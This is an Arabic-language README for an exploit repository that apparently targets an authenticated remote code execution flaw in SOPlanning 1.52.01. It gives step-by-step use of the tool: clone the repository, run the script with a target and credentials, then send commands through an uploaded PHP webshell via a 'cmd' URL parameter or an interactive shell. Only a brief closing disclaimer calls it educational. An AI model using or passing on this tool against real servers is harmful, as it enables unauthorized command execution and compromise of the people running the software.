
# استغلال لـ SOPlanning 1.52.01 (أداة التخطيط عبر الإنترنت البسيطة) - تنفيذ التعليمات البرمجية عن بُعد (RCE) (مصادق عليه)
يحتوي هذا المستودع على استغلال لثغرة تنفيذ الأوامر عن بُعد (RCE) في إصدار SOPlanning 1.52.01. يسمح الاستغلال للمستخدمين المصادق عليهم برفع ملف PHP خبيث وتنفيذ أوامر عشوائية على الخادم.
requests (قم بتثبيتها باستخدام pip install requests)استنسخ هذا المستودع:
git clone https://github.com/TheExploiters/SOPlanning-RCE-1.52.01.git
cd SOPlanning-RCE-1.52.01
قم بتشغيل سكربت الاستغلال:
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <target> -u <user> -p <pass>
استبدل http://example.com:9090 بعنوان الهدف، وadmin باسم المستخدم، وadmin بكلمة المرور.
بعد التنفيذ الناجح، قم بالوصول إلى الويب شل:
Access webshell here: http://example.com/upload/files/{link_id}/{php_filename}?cmd=<command>
لاستخدام القشرة التفاعلية، أجب بـ yes عند المطالبة.
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <target> -u <user> -p <pass>
تم تأليف هذا الاستغلال بواسطة Ardayfio Samuel Nii Aryee وهو مقدم لأغراض تعليمية فقط. المؤلف ومالك المستودع غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج. تأكد من حصولك على إذن صريح قبل اختبار هذا الاستغلال على أي نظام.